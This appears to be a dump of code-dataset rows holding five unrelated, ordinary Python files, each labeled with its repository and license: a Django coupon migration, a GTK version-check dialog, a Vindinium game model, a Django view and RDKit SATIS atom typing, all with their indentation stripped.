| fpeder/mscr | mscr/main.py | Python | bsd-2-clause | 84 |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.18 on 2019-03-20 18:12
from __future__ import unicode_literals
from django.db import migrations
def set_coupons_shop(apps, schema_editor):
Coupon = apps.get_model("campaigns", "Coupon")
for coupon_code in Coupon.objects.filter(campaign__isnull=False):
coupon_code.shop = coupon_code.campaign.shop
coupon_code.save()
def remove_coupons_shop(apps, schema_editor):
Coupon = apps.get_model("campaigns", "Coupon")
Coupon.objects.all().update(shop=None)
class Migration(migrations.Migration):
dependencies = [
('campaigns', '0014_campaign_supplier'),
]
operations = [
migrations.RunPython(set_coupons_shop, remove_coupons_shop),
]
| shoopio/shoop | shuup/campaigns/migrations/0015_set_coupon_shops.py | Python | agpl-3.0 | 749 |
import gtk
import urllib
from json import JSONDecoder
from threading import Thread
class VersionCheck:
"""Small class used for checking and displaying current and
latest version of software detected by getting a file from
project hosting site.
"""
URL = 'https://api.github.com/repos/MeanEYE/Sunflower/releases'
def __init__(self, application):
self._dialog = gtk.Window(type=gtk.WINDOW_TOPLEVEL)
self._application = application
# configure window
self._dialog.set_title(_('Version check'))
self._dialog.set_wmclass('Sunflower', 'Sunflower')
self._dialog.set_border_width(7)
self._dialog.set_position(gtk.WIN_POS_CENTER_ON_PARENT)
self._dialog.set_resizable(False)
self._dialog.set_skip_taskbar_hint(True)
self._dialog.set_modal(True)
self._dialog.set_transient_for(application)
self._dialog.set_type_hint(gtk.gdk.WINDOW_TYPE_HINT_DIALOG)
self._dialog.connect('key-press-event', self._handle_key_press)
# create user interface
vbox = gtk.VBox(False, 5)
hbox = gtk.HBox(False, 0)
table = gtk.Table(2, 2)
table.set_row_spacings(5)
table.set_col_spacings(5)
label_current = gtk.Label(_('Current:'))
label_current.set_alignment(0, 0.5)
label_latest = gtk.Label(_('Latest:'))
label_latest.set_alignment(0, 0.5)
self._entry_current = gtk.Entry()
self._entry_current.set_editable(False)
self._entry_latest = gtk.Entry()
self._entry_latest.set_editable(False)
separator = gtk.HSeparator()
# create controls
button_close = gtk.Button(stock=gtk.STOCK_CLOSE)
button_close.connect('clicked', lambda widget: self._dialog.hide())
# pack user interface
self._dialog.add(vbox)
vbox.pack_start(table, True, True, 0)
vbox.pack_start(separator, True, True, 0)
vbox.pack_start(hbox, True, True, 0)
hbox.pack_end(button_close, False, False, 0)
table.attach(label_current, 0, 1, 0, 1)
table.attach(label_latest, 0, 1, 1, 2)
table.attach(self._entry_current, 1, 2, 0, 1)
table.attach(self._entry_latest, 1, 2, 1, 2)
vbox.show_all()
def __threaded_check(self):
"""Method called in separate thread"""
try:
# get data from web
url_handler = urllib.urlopen(self.URL)
data = url_handler.read()
finally:
decoder = JSONDecoder()
releases = decoder.decode(data)
with gtk.gdk.lock:
self._entry_latest.set_text(releases[0]['tag_name'])
def _handle_key_press(self, widget, event, data=None):
"""Handle pressing keys"""
if event.keyval == gtk.keysyms.Escape:
self._dialog.hide()
def check(self):
"""Check for new version online"""
version = self._application.version
# prepare template
if version['stage'] != 'f':
template = '{0[major]}.{0[minor]}{0[stage]}-{0[build]}'
else:
template = '{0[major]}.{0[minor]}-{0[build]}'
# populate version values
self._entry_current.set_text(template.format(version))
self._entry_latest.set_text(_('Checking...'))
# show dialog
self._dialog.show()
# start new thread and check for new version
thread = Thread(target=self.__threaded_check)
thread.start()
| Goodmind/sunflower-fm | application/tools/version_check.py | Python | gpl-3.0 | 3,045 |
import vindinium as vin
from vindinium.models import Hero, Map, Tavern, Mine
__all__ = ['Game']
class Game(object):
'''Represents a game.
A game object holds information about the game and is updated automatically
by ``BaseBot``.
Attributes:
id (int): the game id.
max_turns (int): maximum turns of the game (notice that each turn only
a single hero moves).
turn (int): current turn.
map (vindinium.models.Map): a map instance.
heroes (list): a list of Hero instances.
mines (list): a list of Mine instances.
taverns (list): a list of Tavern instances.
'''
def __init__(self, state):
'''Constructor.
Args:
state (dict): the state object.
'''
# Constants
self.id = state['game']['id']
self.max_turns = state['game']['maxTurns']
# Variables
self.turn = state['game']['turn']
# Processed objects
self.map = None
self.heroes = []
self.mines = []
self.taverns = []
# Process the state, creating the objects
self.__processState(state)
def update(self, state):
'''Updates the game with new information.
Notice that, this function does not re-create the objects, just update
the current objects with new information.
Args:
state (dict): the state object.
'''
size = state['game']['board']['size']
tiles = state['game']['board']['tiles']
heroes = state['game']['heroes']
self.turn = state['game']['turn']
for hero, hero_state in zip(self.heroes, heroes):
hero.crashed = hero_state['crashed']
hero.mine_count = hero_state['mineCount']
hero.gold = hero_state['gold']
hero.life = hero_state['life']
hero.last_dir = hero_state.get('lastDir')
hero.x = hero_state['pos']['y']
hero.y = hero_state['pos']['x']
for mine in self.mines:
char = tiles[mine.x*2 + mine.y*2*size + 1]
mine.owner = None if char == '-' else int(char)
def __processState(self, state):
'''Process the state.'''
# helper variables
board = state['game']['board']
size = board['size']
tiles = board['tiles']
tiles = [tiles[i:i+2] for i in xrange(0, len(tiles), 2)]
# run through the map and update map, mines and taverns
self.map = Map(size)
for y in xrange(size):
for x in xrange(size):
tile = tiles[y*size+x]
if tile == '##':
self.map[x, y] = vin.TILE_WALL
elif tile == '[]':
self.map[x, y] = vin.TILE_TAVERN
self.taverns.append(Tavern(x, y))
elif tile.startswith('$'):
self.map[x, y] = vin.TILE_MINE
self.mines.append(Mine(x, y))
else:
self.map[x, y] = vin.TILE_EMPTY
# create heroes
for hero in state['game']['heroes']:
pos = hero['spawnPos']
self.map[pos['y'], pos['x']] = vin.TILE_SPAWN
self.heroes.append(Hero(hero))
def __str__(self):
'''Pretty map.'''
s = ' '
s += '-'*(self.map.size) + '\n'
for y in xrange(self.map.size):
s += '|'
for x in xrange(self.map.size):
tile = self.map[x, y]
hero = [h for h in self.heroes if h.x==x and h.y==y]
if tile == vin.TILE_WALL: s += '.'
elif any(hero): s+= str(hero[0].id)
elif tile == vin.TILE_SPAWN: s += 's'
elif tile == vin.TILE_MINE: s += 'M'
elif tile == vin.TILE_TAVERN: s += 'T'
else: s += ' '
s += '|\n'
s += ' ' + '-'*(self.map.size)
return s | renatopp/vindinium-python | vindinium/models/game.py | Python | mit | 4,020 |
# vim: set filencoding=utf8
"""
Story Views
@author: Mike Crute ([email protected])
@organization: SoftGroup Interactive, Inc.
@date: July 10, 2010
"""
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from django.views.generic import list_detail, create_update
from django.core.urlresolvers import reverse
from projects import models, forms
def create_story(request):
return create_update.create_object(request, form_class=forms.StoryForm,
post_save_redirect=reverse('create-story'))
| mcrute/snakeplan | snakeplan/projects/views/stories.py | Python | apache-2.0 | 999 |
# $Id$
#
# Copyright (C) 2001-2006 greg Landrum and Rational Discovery LLC
#
# @@ All Rights Reserved @@
# This file is part of the RDKit.
# The contents are covered by the terms of the BSD license
# which is included in the file license.txt, found at the root
# of the RDKit source tree.
#
""" Functionality for SATIS typing atoms
"""
from rdkit import Chem
_debug = 0
#
# These are SMARTS patterns for the special cases used in
# SATIS typing.
#
aldehydePatt = Chem.MolFromSmarts('[CD2]=[OD1]')
ketonePatt = Chem.MolFromSmarts('[CD3]=[OD1]')
amidePatt = Chem.MolFromSmarts('[CD3](=[OD1])-[#7]')
esterPatt = Chem.MolFromSmarts('C(=[OD1])-O-[#6]')
carboxylatePatt = Chem.MolFromSmarts('C(=[OD1])-[OX1]')
carboxylPatt = Chem.MolFromSmarts('C(=[OD1])-[OX2]')
specialCases = ((carboxylatePatt,97),
(esterPatt,96),
(carboxylPatt,98),
(amidePatt,95),
(ketonePatt,94),
(aldehydePatt,93))
def SATISTypes(mol,neighborsToInclude=4):
""" returns SATIS codes for all atoms in a molecule
The SATIS definition used is from:
J. Chem. Inf. Comput. Sci. _39_ 751-757 (1999)
each SATIS code is a string consisting of _neighborsToInclude_ + 1
2 digit numbers
**Arguments**
- mol: a molecule
- neighborsToInclude (optional): the number of neighbors to include
in the SATIS codes
**Returns**
a list of strings nAtoms long
"""
global specialCases
nAtoms = mol.GetNumAtoms()
atomicNums = [0]*nAtoms
atoms = mol.GetAtoms()
for i in xrange(nAtoms):
atomicNums[i] = atoms[i].GetAtomicNum()
nSpecialCases = len(specialCases)
specialCaseMatches = [None]*nSpecialCases
for i,(patt,idx) in enumerate(specialCases):
if mol.HasSubstructMatch(patt):
specialCaseMatches[i] = mol.GetSubstructMatches(patt)
else:
specialCaseMatches[i] = ()
codes = [None]*nAtoms
for i in range(nAtoms):
code = [99]*(neighborsToInclude+1)
atom = atoms[i]
atomIdx = atom.GetIdx()
code[0] = min(atom.GetAtomicNum(),99)
bonds = atom.GetBonds()
nBonds = len(bonds)
otherIndices = [-1]*nBonds
if _debug: print code[0],
for j in range(nBonds):
otherIndices[j] = bonds[j].GetOtherAtom(atom).GetIdx()
if _debug: print otherIndices[j],
if _debug: print
otherNums = [atomicNums[x] for x in otherIndices] + \
[1]*atom.GetTotalNumHs()
otherNums.sort()
nOthers = len(otherNums)
if nOthers > neighborsToInclude:
otherNums.reverse()
otherNums = otherNums[:neighborsToInclude]
otherNums.reverse()
for j in range(neighborsToInclude):
code[j+1] = min(otherNums[j],99)
else:
for j in range(nOthers):
code[j+1] = min(otherNums[j],99)
if nOthers < neighborsToInclude and code[0] in [6,8]:
found = 0
for j in range(nSpecialCases):
for matchTuple in specialCaseMatches[j]:
if atomIdx in matchTuple:
code[-1] = specialCases[j][1]
found = 1
break
if found:
break
codes[i] = ''.join(['%02d'%(x) for x in code])
return codes
if __name__ == '__main__':
smis = ['CC(=O)NC','CP(F)(Cl)(Br)(O)',
'O=CC(=O)C','C(=O)OCC(=O)O','C(=O)[O-]']
for smi in smis:
print smi
m = Chem.MolFromSmiles(smi)
codes = SATISTypes(m)
print codes
| rdkit/rdkit-orig | rdkit/Chem/SATIS.py | Python | bsd-3-clause | 3,432 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.